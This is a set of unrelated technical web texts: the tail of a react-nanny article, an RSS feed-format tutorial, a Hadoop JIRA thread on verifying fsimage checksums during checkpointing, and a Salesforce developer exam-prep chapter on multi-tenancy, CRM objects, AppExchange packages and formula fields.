There are also many additional utils that we didn’t discuss in this article:

react-nanny — Utils to manage your React Children; find and filter children by type or custom function, enforce child content, and…

Here is a list of the utils currently available in react-nanny:

- getChild — Gets first child by specified predicate
- getChildDeep — Gets first child by specified predicate (deep search)
- getChildByType — Gets first child by specified type
- getChildByTypeDeep — Gets first child by specified type (deep search)
- getChildren — Gets all children by specified predicate
- getChildrenDeep — Gets all children by specified predicate (deep search)
- getChildrenByType — Gets all children by specified type
- getChildrenByTypeDeep — Gets all children by specified type (deep search)
- noEmptyChildrenDeep — Ensure that there is some level of content and not just a bunch of empty divs, spans, etc (deep search)
- removeChildren — Removes all children by specified predicate
- removeChildrenDeep — Removes all children by specified predicate (deep search)
- removeChildrenByType — Removes all children by specified type
- removeChildrenByTypeDeep — Removes all children by specified type (deep search)
- typeOfComponent — Gets the string type of the component if defined by a prop, the string type of the core html (JSX Intrinsic) element, or the function type

Go forth and be good to your React children!

As a matter of practice, I highly recommend creating your own prop to identify what kind of component it is. Even if you think you’ll never use it, it’s good to have it in place for a time when it might save your bacon. If you’re needing to also filter core HTML Element components like divs, spans, etc., I highly recommend you continue on to my article on that topic:
https://mparavano.medium.com/find-filter-react-children-by-type-d9799fb78292
RSS - Feed Formats

RSS has been released in many different versions over the last 10 years. Here we will give you details about the three most commonly used RSS versions.

RSS v0.91 Feed Format

RSS v0.91 was originally released by Netscape in 1999. RSS v0.91 does not have an RDF header. RSS v0.91 is called Rich Site Summary (RSS). RSS v0.91 has features from Dave Winer's RSS version scriptingNews 2.0b1. RSS v0.91 has support for international languages and encodings, for image height and width definitions, and for description text for headlines.

Check the complete set of RSS v0.91 tags and syntax.

RSS v1.0 Feed Format

RSS 1.0 is the only version that was developed using the W3C RDF (Resource Description Framework) standard. This version of RSS is called RDF Site Summary. RSS 0.91 and RSS 2.0 are easier to understand than RSS 1.0.

Check the complete set of RSS v1.0 tags and syntax.

RSS v2.0/2.01 Feed Format

RSS 2.0/2.01 is very similar to RSS 0.9x. RSS 2.0/2.01 adds namespace modules and six optional elements to RSS 0.9x. The RSS 2.0/2.01 specification was written by Dave Winer of Radio UserLand. The copyright was later transferred to Harvard University.

Check the complete set of RSS v2.0 tags and syntax.
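To make the format concrete, here is a minimal RSS 2.0 document. The element names come from the RSS 2.0 specification; the channel contents are made up for illustration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <!-- required channel elements: title, link, description -->
    <title>Example Feed</title>
    <link>http://www.example.com/</link>
    <description>A minimal RSS 2.0 channel</description>
    <!-- one entry in the feed -->
    <item>
      <title>First post</title>
      <link>http://www.example.com/posts/1</link>
      <description>Hello, RSS.</description>
    </item>
  </channel>
</rss>
```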
http://www.tutorialspoint.com/rss/rss-feed-formats.htm
I've just committed this. Thanks again for the review, Todd.

Oh, please run at least the following tests before commit:

src/test/org/apache/hadoop/hdfs/TestDFSStorageStateRecovery.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestStartup.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestNameEditsConfigs.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestSaveNamespace.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestCheckpoint.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestEditLog.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestSecurityTokenEditLog.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestStorageRestore.java
src/test/org/apache/hadoop/hdfs/server/namenode/TestCheckPointForSecurityTokens.java

Thanks!

+1, looks good to me.

> Some of the new info messages should probably be debug level

There were only a few new info messages. I changed one of them to debug, and made one other less verbose, since some of the info is only relevant in the event of an error, and in that case the extra info is printed as part of the exception.

> Do we also need to add some locking so that only one 2NN could be uploading an image at the same time?

Agreed. This isn't strictly necessary to fix the issue identified in this JIRA, but I agree that this is a potential for error as well.

> getNewChecksum looks like it will leak a file descriptor

Thanks, good catch.

I thought about doing this. Though it seems like it would make for a more straightforward back-port, the back-port isn't easy regardless because of other divergences between trunk and branch-0.20-security.
So, we don't seem to be gaining much by doing it this way, and since we wouldn't be storing the previous checksum as part of the VERSION file, we wouldn't be getting the intended benefit of HDFS-903 ("NN should verify images and edit logs on startup.")

I'll upload a patch in a moment which addresses all of these issues, except the last one. Todd, if you feel strongly about it, I can rework the patch as you described to be a more faithful back-port of HDFS-903.

- Some of the new info messages should probably be debug level
- Do we also need to add some locking so that only one 2NN could be uploading an image at the same time? eg what about the following interleaving:
  - 2NN A starts uploading a good checkpoint which is large
  - 2NN B starts uploading an invalid checkpoint which is small, which overwrites fsimage.ckpt
  - 2NN B gets the cksum error, leaving its bad fsimage.ckpt in place
  - 2NN A finishes uploading, and calls checkpointUploadDone
  - B's fsimage.ckpt is rolled into place
- getNewChecksum looks like it will leak a file descriptor - need a try/finally close

Here's a patch which addresses the issue. This is a full and faithful back-port of HADOOP-7009 and a partial, minimal back-port of HDFS-903 which doesn't change the layout version, and instead calculates checksums for the fsimage on the fly. This patch is for branch-0.20-security.

I should've mentioned - this patch is for branch-0.20-security.

Here's a patch (not intended for commit) which contains a test that exercises this case, just to demonstrate the issue. The final assert will fail.

Hey Suresh, unfortunately it does not. Though the CheckpointSignature object does include the editsTime and checkpointTime, CheckpointSignature.validateStorageInfo only validates the values of layoutVersion, namespaceID, and cTime, none of which change on a checkpoint.
So, though the CheckpointSignature would prevent the NN from grabbing an invalid fsimage from a different file system, the NN can't tell the difference between an old fsimage and an up-to-date fsimage from the same file system. For reference:

    void validateStorageInfo(StorageInfo si) throws IOException {
      if(layoutVersion != si.layoutVersion
          || namespaceID != si.namespaceID
          || cTime != si.cTime) {
        // checkpointTime can change when the image is saved - do not compare
        throw new IOException("Inconsistent checkpoint fileds. "
            + "LV = " + layoutVersion
            + " namespaceID = " + namespaceID
            + " cTime = " + cTime
            + ". Expecting respectively: "
            + si.layoutVersion + "; " + si.namespaceID + "; " + si.cTime);
      }
    }

Aaron, doesn't CheckpointSignature prevent this problem from happening?

Sounds like a plan.

@Todd - yep, I agree. Option 3 as described is a subset of HDFS-903. Perhaps, then, the thing to do for this JIRA is to do a partial back-port of HDFS-903 to the 0.20-security branch in such a way so as to not require a change to the layout version. Since the goal of this JIRA is just to prevent receiving the wrong fsimage during checkpointing, not to verify the validity of the fsimage coming off disk, there's no need to store the checksum in the VERSION file. Rather, we can just compute the checksum on the fly, but still send it with the CheckpointSignature during checkpointing.

There are two obvious work-arounds for this issue:

- Explicitly configure the address of the 2NN (dfs.secondary.http.address). This would prevent 2NNs from starting up which couldn't bind to that address.
- Do something else to make sure that there is only ever one 2NN running.

But we should still harden HDFS to make it so that this scenario is less likely to occur. Right now it's all too easy (with the default configs) to find oneself in this scenario. I can think of a few possible solutions:

- Don't have a default value for the dfs.secondary.http.address.
Require the user to set it, and don't allow the 2NN to start up without it. The NN will reject connections to roll/fetch fsimage/edits from any machine that's not connecting from this configured address.

- On start-up, the 2NN makes an RPC to the NN to generate a unique token. This token is subsequently used for all NN and 2NN communication. The NN will reject any communication from a 2NN with a different token. This will effectively lock out any previously-started 2NNs from mutating the NN state.
- Before transferring the fsimage back to the NN, the 2NN computes a checksum of the newly-merged fsimage, and informs the NN of the expected checksum. On download of the new fsimage, the NN verifies the checksum of the downloaded file against the expected checksum from the 2NN.

Of these, I think I'm inclined to go with option 3. Option 1 is dead simple, but has the downside of changing default config options and requiring an extra step to set up a Hadoop cluster. Option 2 seems like overkill to me. Option 3 is relatively simple, and has the added benefit of providing an extra integrity check of the fsimage state during network transfer.

Thoughts?

Closed upon release of Hadoop-1.1.0.
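The shape of option 3 can be sketched in a few lines of Java. This is a hypothetical illustration, not the actual Hadoop patch: the 2NN computes a digest of the merged fsimage and sends it along with the checkpoint signature, and the NN recomputes the digest over the bytes it received and rejects the upload on mismatch.

```java
// Hypothetical sketch of option 3: verify an uploaded fsimage by checksum.
import java.security.MessageDigest;

public class Main {
    // Hex-encoded MD5 digest of a byte array.
    static String digest(byte[] data) throws Exception {
        MessageDigest md = MessageDigest.getInstance("MD5");
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest(data)) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        byte[] fsimage = "merged fsimage bytes".getBytes("UTF-8");
        String expected = digest(fsimage);       // computed by the 2NN before upload
        byte[] uploaded = fsimage.clone();       // what the NN actually received
        boolean ok = expected.equals(digest(uploaded));
        System.out.println(ok ? "checkpoint accepted" : "checkpoint rejected");
    }
}
```

If a stale or concurrently-overwritten fsimage.ckpt were rolled into place, its digest would not match the expected value and the NN could refuse it, which is the integrity check the comment above argues for.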
https://issues.apache.org/jira/browse/HDFS-2305?focusedCommentId=13094918&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
Salesforce is a company, founded by Marc Benioff and Parker Harris in 1999, that specializes in software as a service (SaaS). Salesforce started by selling a cloud-based Customer Relationship Management (CRM) application, which laid the foundation for many of its future services and was built on the Salesforce Platform. Following this, the company began packaging other applications that were closely intertwined on the same platform and divided them into clouds. These cloud-based applications are now popularly known as Sales Cloud, Service Cloud, Marketing Cloud, IoT Cloud, Integration Cloud, Community Cloud, Health Cloud, and Financial Services Cloud, among others.

In this chapter, you will learn about the basic concepts of working on the Salesforce Platform. The material covered in this chapter represents 10% of the exam questions. We'll learn about the following topics in this chapter:

We'll end the chapter with a summary and a quiz so that you can check whether you understand everything that you need to for the exam.

We've briefly mentioned what Salesforce is in the introduction, but it's also important to know what the Lightning Platform is before we start talking about multi-tenancy. The Lightning Platform is the infrastructure in which companies can enable one or more of the aforementioned cloud products, install apps from the AppExchange (the Salesforce store), or build their own custom apps. Using the platform alone—that is, without one of the core cloud products such as Sales Cloud or Service Cloud—is also possible through Salesforce's platform as a service (PaaS) option. In a similar way to their CRM application, customers can pay a monthly fee to access the shared resources and build custom apps through PaaS.

The biggest benefit of using or buying a cloud service product is that everything is taken care of by the provider—that is, the servers, storage space, the infrastructure, networks, security, backups, and upgrades.

Some characteristics of using cloud-based services are as follows:

- They are subscription-based models
- They have low startup fees
- They have fixed and predictable costs (that is, you pay as you use the service)
- They are scalable
- They include regular, automated upgrades
- They are multi-tenancy platforms; this means that multiple customers use (or share) the same instance

These are important features to bear in mind when talking about multi-tenancy!
Some characteristics of using cloud-based services are as follows: - They are subscription-based models - They have low startup fees - They have fixed and predictable costs (that is, you pay as you use the service) - They are scalable - They include regular, automated upgrades - They are multi-tenancy platforms; this means that multiple customers use (or share) the same instance These are important features to bear in mind when talking about multi-tenancy! When I try to explain multi-tenancy to my customers, I always compare it to an apartment block. For example, consider a scenario, where you – as a company or a customer – rent an apartment in a block that is owned by Salesforce, who is your landlord: Here, your apartment has specific layouts and resources – that is, it has a number of rooms divided by walls. In addition to this, it has central heating, electricity, water, and more. To access and use this apartment, you pay a monthly rent, and everything else is taken care of for you and the other occupants in the building by your landlord. Apart from your apartment (which is your private space), all the other resources are shared by the occupants of the building. This means that if Salesforce decides to upgrade the central heating to underfloor heating, then you will automatically benefit from this. You can see this as three releases (that is, upgrades containing new features and enhancements) a year, which Salesforce implements. The preceding diagram represents the difference between buying a single house, which is yours (Single-Tenancy), and renting an apartment in a block with multiple apartments (Multi-Tenancy). Within your apartment, you can design your interior just the way that you want, and adjust it to your needs and personal preference! For instance, you can choose what room to have as your bedroom or your kitchen; or, alternatively, you can use the whole apartment as an office space. You can even paint the walls blue or flashy green if you want to. 
This is similar to using a Salesforce Platform, where once you have access to your space, you can then create new custom objects, add fields, and automate features to suit your business needs. The only thing that you can't do is break down the walls – otherwise, the whole building will collapse, right?

Even though you have full flexibility in rearranging your apartment, you are still limited when it comes to certain things! For example, you can't put in a 5-meter sofa if the size of the room is smaller than this; additionally, you can't put in a Christmas tree that is higher than the height of your room, or you would need to break the ceiling, and your neighbor would start a lawsuit against you. Alternatively, you can't just install multiple high-voltage accessories or machines in your apartment without the electricity box exploding and leaving the whole building without power!

I use this analogy in order to explain the governor limits that Salesforce enforces. Salesforce enforces these limits to make sure that no one single occupant will consume resources that could impact the other tenants or occupants who are using the Salesforce infrastructure.

Salesforce uses a multi-tenancy architecture, meaning that a number of organizations (orgs) share the same IT resources, as opposed to dedicated resources. This results in a standard environment that is fully operated and managed by Salesforce, which is much more efficient and cost-effective for your company.

The self-contained unit that allows an org to run is called an instance; it contains everything that is needed to run an org:

- An application and database server
- A file server
- A server, storage, and network infrastructure

An org is an independent configuration (or metadata) and data that is dedicated to a customer. It is represented by a unique ID that you can find in the Company Profile section in Setup. You must provide this ID each time you contact Salesforce support for Cases, Feature Request, and more.
Each org only runs on one instance, which serves thousands of other orgs. The org's unique ID is stored in every table in the shared database to allow the filtering of data, and to ensure that a client's data is only accessed by that client alone.

Some advantages of multi-tenancy are as follows:

- All Salesforce customers, from small businesses to enterprise companies, are on the same code base and they all benefit from the same features and new functionality.
- Salesforce upgrades are easy, automatic, and seamless. There are three automatic upgrades a year, which are called the Spring, Summer, and Winter releases.
- With upgrades, a version is associated with every Apex trigger and Apex class. Here, backward compatibility is assured.
- Each class has a version associated with it called the API version. When you move to the next release, the Apex class always uses the older version of the compiler to guarantee this backward compatibility. Otherwise, you can modify the code to work on the newest version.

So, if all resources are shared by multiple customers, how does Salesforce ensure that one customer doesn't eat up all resources or break things that could impact all other customers on the same instance? Salesforce controls this by enforcing two things, which can be considered as the side effects of multi-tenancy:

- Governor limits: These are the limits enforced by Salesforce that cannot be changed, and they are the same for anyone using the platform. For example, you can only use 100 queries in one execution context or perform 150 DML (short for Data Manipulation Language) statements in one execution context. Don't worry if you don't understand this yet, as we'll come back to this later. You can find the list of all the governor limits in the Salesforce documentation at.
- Mandatory testing: Salesforce forces you to test your code before you are allowed to deploy it to production or upload a package to the AppExchange.
At least 75% of all code must be covered by tests and they should all pass. Every trigger within your deployment package needs at least some coverage. It's best practice to test all possible scenarios, including positive and negative tests, in addition to testing for bulk updates or creation.

MVC is an architectural design pattern in modern software development that promotes the separation of an application into three components:

- An application's data storage (model)
- An application's user interface (view)
- An application's logic (controller)

The following diagram maps Salesforce's components to this architectural design:

This architecture is used a lot in software development because the isolation of data (that is, the model), user interface (that is, the view), and logic (that is, the controller) allows each component to be developed, tested, and maintained independently.

- Model: This is actually where your data is stored and can be used. To store data, you need objects or fields, and these are considered to be part of the model.
- View: This is whatever end users see and interact with; that is, what displays data to the clients or customers. This allows you to control how (and what) data is shown on the user interface. So, standard pages, page layouts, Visualforce pages, Lightning components, console layouts, and mini page layouts are all considered part of the view.
- Controller: This refers to the actual logic and actions that are executed when someone interacts with Visualforce pages, standard pages, or Lightning components. The controller is the link that binds the client side and the server side. It will mostly consist of Apex; this means that even when building Lightning components, you'll probably need Apex to get the data from the database on the server and pass it to the JavaScript controller. The new Lightning Data Service from Salesforce acts like a standard controller—it connects to objects and fields in the database without writing any Apex.
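A minimal Apex controller sketch can make the "C" in MVC concrete on the platform. All class, object, and field names here are illustrative, not from any particular org:

```apex
// Hypothetical custom controller: the controller layer in Salesforce's MVC.
// The model is the Contact object in the database; the view is a Visualforce
// page or Lightning component that binds to `contacts` and invokes `refresh`.
public with sharing class ContactListController {
    public List<Contact> contacts { get; private set; }

    public ContactListController() {
        // The controller pulls data from the model (a SOQL query)...
        contacts = [SELECT Id, Name, Email FROM Contact LIMIT 10];
    }

    public void refresh() {
        // ...and exposes actions that the view can trigger.
        contacts = [SELECT Id, Name, Email FROM Contact LIMIT 10];
    }
}
```

Note how the query count matters here: each SOQL statement counts against the governor limit of 100 queries per execution context mentioned earlier, which is why controllers are written to query once and reuse the result.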
You could describe MVC like this—when you see a registration form (such as the Visualforce page developed on Salesforce), enter some information into the form, and then hit submit, the details are sent to a database and are saved into tables, columns, and rows (these are Salesforce objects and fields). Which data goes to what object and field in Salesforce is controlled by the logic defined in the standard and custom controllers. I expect that this will be a recap for you; however, just to be sure, I would like to summarize the functionalities paired with some of the most popular core CRM objects. This is important, as a lot of questions in the exam will give you business scenarios around these objects, and before thinking about programmatic solutions, you should consider whether there is any declarative solution that comes out of the box that could be used to meet the requirement. The lead object is mostly used for individuals and/or companies that have been identified as potential customers but have not been qualified yet. Leads can be created in several ways; you can create them manually one by one, by clicking on New in the Lead tab. They are usually imported from .csv files (and quite possibly bought by your marketing and/or sales department). Alternatively, they can be created automatically when using the out-of-the-box web-to-lead functionality that generates the HTML form that you put on specific pages of your website(s). Some of the functionalities that are offered by Salesforce for leads are as follows: - Web-to-lead functionality: This generates an HTML form that you can use on any web page. Here, you select the lead fields you would like the user to fill in on your website and it automatically creates a lead in Salesforce on submission of the form. Be aware that validation rules and duplicate management rules configured on the lead object will also be applied. 
Web-to-lead functionality works well when combined with auto-response rules and assignment rules. It has a limit of 500 created leads within a 24-hour period. If this limit is reached, Salesforce stores the overflow in a queue and will process them when the limit is refreshed. Be aware that this queue is limited to 50,000 leads and cases. It is possible to increase the daily limit by submitting a case with Salesforce Support.

- Lead auto-response rules: When new leads get created, you can specify whether an email needs to be sent to the lead automatically, and which email template should be sent out.
- Lead assignment rules: Upon lead creation, you could set up the automatic assignment of these leads to specific users or queues based on specific criteria, such as language, segment, or sector. You can only have one active assignment rule per object, but this assignment rule can contain multiple criteria and logic entries.
- Lead queue: Custom objects and some standard objects (including leads) can be assigned to a queue. Queues are similar to lists of records, where these records are waiting to be picked up and treated by members assigned to the queue. Queue members can then pick records from the queue and go on to contact the lead, disqualify them, and then start the conversion process. A queue can contain public groups, roles, subordinates, and users as queue members.
- Lead conversion: Within a standard sales process, leads usually require some sort of qualification. This means that someone will try to contact the lead and will try to determine whether they could potentially do business together. A common means of qualification is to determine the Budget, Authority, Need, and Time (BANT). If the lead does not qualify, then the status is changed to disqualified. If the lead does qualify, then the lead will be converted into an account, a contact, and, optionally, an opportunity.
This conversion process will map lead fields to corresponding fields on the account, contact, and opportunity, which can be defined by a system administrator:

Note

A lead will always convert into a contact, and depending on whether you have Person Accounts enabled in your org, an account will also be mandatory (either a new or existing account). If Person Accounts is enabled, then the conversion process will convert your lead to a Person Account if the Company field is left empty.

After the conversion process is successfully executed, the lead will be flagged as converted and will no longer be visible in the search results (unless your profile has the View and Edit Converted Leads permission).

Accounts are orgs or individuals (when Person Accounts is enabled) that are involved with your business in some way (such as a customer, competitor, partner, or supplier). There are two types of accounts, as follows:

- Business accounts (B2B): This is the default account type. An account usually contains general information about a company, such as the name, billing address, shipping address, sector, segment, and VAT number. They also contain several related lists of records, such as the people who work there, the cases that are logged, the opportunities that are sent, the documents that are uploaded, and more.
- Person accounts (B2C): If your company also deals with individuals rather than companies, you can ask Salesforce to enable Person Accounts in your org. However, be aware that once this feature has been enabled, it cannot be disabled (but you can still choose not to use the record type). Person Accounts are a combination of the account object and the contact object. They mostly contain personal information, such as first name, last name, date of birth, gender, hobbies, interests, and more. Of course, if your company deals in both B2B and B2C, then you can use both business accounts and Person Accounts in your org.
The account object also comes with some specific features, as follows:

- Account hierarchies: The account object has a standard lookup field called the parent account. When this is filled in, it creates a hierarchical relationship between the accounts. When clicking on View Account Hierarchy from an account, you can see the whole account relationship from the point of view of the current record. You can easily navigate from one account to the other within the hierarchy. An admin can also modify or adjust up to 15 columns, shown on the Hierarchy overview page, through Setup | Object Manager | Account | Hierarchy Columns. The following screenshot shows how the Account Hierarchy is presented to the user on the Salesforce interface:

- Account teams: These are another way in which to grant access to a specific account record, next to Organisation-Wide Defaults (OWD), sharing rules, and manual sharing. Here, the owner of an account can specify other users (called Account Team Members) working on that same account with a specific business role (such as inside sales, support representative, or project manager) and specific privileges (read-only or read-write). A user is also able to specify a default account team, which will automatically be added onto any account where that user is the owner. The account teams feature is disabled by default; you can enable it by going to Setup | Feature Settings | Sales | Account Teams.

This refers to the individuals working on your accounts with whom you have contact. It mostly contains more personal details such as date of birth, gender, and language. Additionally, it can also contain company details, such as title, department, and, optionally, their relationship to another contact to whom they report. This ReportsToId lookup field is similar to the Parent Account field, and allows you to present a hierarchy between your contacts.
Under normal circumstances, a contact is always directly related to an account. It is possible to mark the account lookup as non-required, but when a contact is not associated with an account, then it becomes a private contact instead. Private contacts are only visible to the record owner and system administrators, and cannot be shared with others. For marketing purposes, it is important to avoid duplicates between contacts; however, what if the same contact plays a role on multiple accounts? For this specific reason, Salesforce introduced a new feature called Contacts to Multiple Accounts. This feature is disabled by default, but you can enable it through Setup | Feature Settings | Sales | Account Settings: Once enabled, the related list, related account, and related contact details will need to be added to your respective contact's and account's page layouts. You can remove the standard contact's related list from the account page layout because the new related list contains both the direct and indirect contacts or accounts. Each contact will still have one direct account through account lookup, but you will be able to create extra relationships with other accounts by adding a new Account Contact Relationship. These will automatically be marked as indirect. However, because these relationships are with another specific object in the Salesforce database, the individual will only exist once in the contact table, which is fantastic news for your marketing department. This represents the potential revenue that sales representatives can track through different stages of the sales process until the deal is either won or lost. 
Opportunities come with multiple sales-related features, as follows:

- Building your company's pipeline
- Forecasting revenue and determining the next steps to move forward in the sales cycle

In combination with products, price books, and price book entries (prices), opportunities can add a great level of detail to what you are selling to your customers. The opportunity object comes with some specific features, as follows:

- Opportunity teams: These are very similar to account teams; they allow you to add other users to work on the same opportunity with a specific role and access right. On the user record, it's also possible to add a default opportunity team.
- Opportunity splits: If opportunity teams are enabled, then you can also enable opportunity splits. These are used to share the revenue of an opportunity between multiple users. In this way, they all contribute to winning the deal. This means that the opportunity team members, who are collaborating to win an opportunity, will individually get credit in the pipeline reports, and this will contribute to them achieving their quota. Note that this is not really something that you must know for the exam, so if you want to learn more about this topic, then you can read more at.
- Collaborative forecasting: This feature will help you predict the pipeline. A forecast represents the expected revenue based on the sum of the total set of opportunities. Forecasts can be adjusted by managers in order to get a more accurate prediction without effectively changing the underlying opportunities' amounts. They are split up by forecast category, time period, and, optionally, by product.

AppExchange is the official Salesforce marketplace for business applications and is available at. An app is a bundling of custom objects, fields, programmatic and/or declarative logic, and automations. Apps solve a specific business requirement or support a specific business process in a better way.
You can install an app from AppExchange by simply clicking on the Get It Now button and deciding whether to install it in a production or a sandbox environment. When you get a new requirement, it's good practice to check on AppExchange first, in order to see whether there is a solution already – either free or paid. So, what can you find on AppExchange? Well, let's take a look, as follows:

- Apps: These are groups of tabs, objects, components, and business logic that work together to provide standalone functionality.
- Lightning components: These are the building blocks of functionality that you can drag and drop into a Lightning app, on Lightning pages, or community pages through the Lightning App Builder interface.
- Flow solutions: If you want to automate your business process with flow actions, then Lightning flow is considered one of the most powerful, and more advanced, declarative automation tools. The chances are that somebody has already built some flow processes that meet your needs.
- Lightning bolt solutions: These are industry template solutions, which are mainly built by partners to help you get to market faster. Lightning bolts contain process flows, apps, Lightning components, and even whole communities.
- Lightning Data: These are pre-integrated, approved, and scalable data solutions. If you want to connect to a data source supplier, such as D&B, then first check whether there is a Lightning Data solution for it.
- Consulting partners: If you are looking for help implementing or expanding your Salesforce solution, then AppExchange contains a listing of all consulting partners worldwide, including reviews.

AppExchange is extremely easy to search—you just type in a keyword and it will start giving you suggestions. You can easily filter the search options according to industry to see what apps are popular in your industry. Additionally, you can filter by solution type, price, compatibility with your Salesforce edition, ratings, and language.
It will even suggest learning modules on Trailhead, the free online Salesforce learning platform! Here are the things that you need to consider when choosing an AppExchange solution:

- Is it free or paid? Does it fit within your budget?
- Is it compatible with your Salesforce edition?
- Does it require you to turn on some features that are not yet enabled in your org?
- Is it Lightning-compatible or does it only work in Classic?
- What do the reviews say? Are any of your requirements not met?
- Always test in a sandbox environment first!

When talking about AppExchange, it's important that we talk about packages, because that's what you will be installing—a package. Packages are bundles of metadata components that make up an app or solution. A typical package will contain objects, fields, Workflow Rules (WFRs), validation rules, processes, approval processes, flows, Apex classes, Visualforce pages, and Lightning components. There could be hundreds of them in one package. Packages are used for distribution across unrelated orgs—it's like deploying a change set. In fact, anybody can create a package for distribution, and then share the link with someone else to install the solution in their org. These packages are private and the receiver must know the exact URL of the package to be able to install it. If you want your package to be publicly available, searchable, and/or listed, then it must be uploaded on AppExchange. Packages that are published on AppExchange also come in two variants, as follows:

- Unmanaged packages:
- They are used for distribution across orgs.
- By installing an unmanaged package, you copy all its contents into your org and, after installation, you can modify everything. You can change the Apex code, the Visualforce code, mark fields as required or not, change their data types, and more.
- The contents of the package become yours.
- This also means that the creator or provider loses all control and, in most cases, they cannot offer any support on the package.
- They don't need to have a namespace.
- The packaged components will count toward your org limits.

- Managed packages:
- The source code of managed packages is hidden from you.
- You can't see or modify any of the code.
- Managed packages can only be created in a developer environment.
- This also means that the creator or provider has control over the installed version and can offer upgrades.
- The provider will mostly provide support on the package.
- You can grant the provider access to your org to support you, in the same way that you would grant access to Salesforce Support.
- The packaged components do not count towards your org's limits.
- The use of a namespace is required.
- Managed packages are typically for sale on the AppExchange.

It's important to understand one of the biggest differentiators of Salesforce in comparison to other CRMs. Salesforce provides a lot of tools and features to maximize declarative customization (through point-and-click tools). In fact, while configuring Salesforce to suit your business needs, in 80% of cases, you will be able to solve your requirement with declarative functionality. For the remaining 20% of the use cases, you'll need some kind of programmatic development. Becoming a certified platform developer does not mean that you solve everything with code. Customers, consultancy agencies, and Salesforce all expect a Salesforce developer to be able to use the easiest tool to achieve a solution and, therefore, most of the exam will assess whether you are able to distinguish what can be achieved through declarative configuration and what cannot, requiring a more programmatic approach. In Chapter 3, Declarative Automation, we'll dive deeper into ways to automate your business through declarative tools and programmatic options.
For now, let's just recap the most commonly used declarative features that Salesforce offers an admin out of the box. Salesforce comes with a lot of standard objects, all of which have standard fields. Objects and fields allow you to capture data in the database. Consider the following screenshot; here, you can compare objects and fields by having an Excel file, where you have a sheet for every object, such as accounts, contacts, quotes, and so on. In this case, you will need to keep track of multiple records and specific data:

You will also need a row for each account record, along with columns for the data that you would like to track for the account. In Salesforce, these are represented by fields. Just like in Excel, a field can have a certain data type depending on what type of data you are tracking—that is, text, phone numbers, URLs, dates, and more. Each object can be, but doesn't have to be, represented by a tab in Salesforce, just like creating a sheet per object in Excel. Having a tab for the object gives you the benefit of creating filtered list views of records for that type of object. Additionally, you can extend your database to your needs; this is done by creating new custom objects yourself and creating extra custom fields on the existing standard objects and/or on your newly created custom objects to track whatever data you deem necessary. While creating a field, just like in Excel, you have the choice between several data types, such as Text, Text Area, Rich Text Area, Lookup relationship, Master-Detail relationship, Checkbox, Picklist, Multi-Select Picklist, Phone, Date, DateTime, Time, Currency, Geolocation, Formula fields, and Roll-up Summary fields. A formula field is like a real-time calculation that is calculated when it is loaded or requested. It's like a formula in an Excel spreadsheet. We refer to it as loaded or requested, because it's not a calculation that appears while viewing a record in the user interface.
When you request the record data, it is calculated (or recalculated) using the following methods:

- By viewing it in the UI or in a report
- By exporting the data through a data loader
- By reading the data through an API call
- By querying the data in a SOQL query

A formula field is always read-only. This means that it's not a field in which you can type or change its value manually – it is always calculated. As a result of this, the calculation does not perform an update on the record and this can never trigger any automations. What I mean here is that you can't have something like a WFR fire when the formula's value changes, because recalculating a formula does not count as an update of the record. You can, however, use the value of a formula field in your automation processes as a criterion or as a value. I know this is somewhat confusing, so let's try to explain it using an example. Let's say that we create a formula field returning a date that is calculated, based on the creation date of a record plus 30 days, and we would like to automatically create a task for the owner when we reach that date. You could be tempted to create a Process Builder that evaluates whether TODAY() equals the date field. If it does, then create the task; as long as that date is not equal, it's still either in the future or already past. Now, if the record does not get updated by someone manually, or by some other automation, then nobody will touch this record and this Process Builder won't fire—this is because all automations only fire on the creation or updating of records. Additionally, a formula field is calculated in real time when it gets requested and does not perform an update of the record. You can use your own logic in order to build the calculation that it needs to perform, and Salesforce offers a lot of functions for you to use within your formulas. For instance, I really like the Salesforce Formula Cheatsheet, which contains the most-used functions.
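As a concrete sketch, the "creation date plus 30 days" field from the example above is a one-line formula with a Date return type; CreatedDate is a standard field, so no assumptions are needed beyond those already in the example:

```
/* Formula field (return type: Date): the record's creation date plus 30 days */
DATEVALUE(CreatedDate) + 30
```

Such a field recalculates whenever it is requested, which is exactly why the Process Builder in the example never fires on its own.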
You can find it at. A formula field can return the following things:

- Checkbox
- Currency
- Date
- Datetime
- Time
- Number
- Percent
- Text

Formulas usually perform calculations with other values in the record that they reside on, but they can also use the values of parent records, or grandparent records, up to 10 levels up. However, they cannot use the values of child records. So, a common use case for a formula field is to display data from its parent. For example, let's say that we have a custom Picklist field, Region__c, on the account page and we would like to show this value on our opportunities page. Because an opportunity is directly linked to an account, we could create a formula field that renders the text using the formula TEXT(Account.Region__c). Because a formula is always calculated in real time, this value will always represent the actual value from the Region__c field of the account on our opportunity, without manually updating all opportunities of this account whenever the Region__c field changes on the account. A formula field that uses data from its parent, or higher up the hierarchy, is called a cross-object formula. Formulas do have some limitations that you need to be aware of; for example, you will get an error message if your formula does not comply with the following limits:

- The maximum number of characters is 3,900.
- The maximum formula size when saved is 4,000 bytes.

When your formula exceeds either of the aforementioned character or byte limits, then you will receive an error message mentioning this. A roll-up summary (RUS) field is very much like a formula field in that it also performs a calculation. However, this is based on child records, and only when these child records are part of a Master-Detail relationship! It's used to summarize a numeric value based on (filtered) child records and can perform COUNT, SUM, MIN, and MAX operations.
It is recalculated whenever a transaction on these child records occurs in the following ways:

- When a new child is created
- When one of the children gets updated
- When a child gets deleted

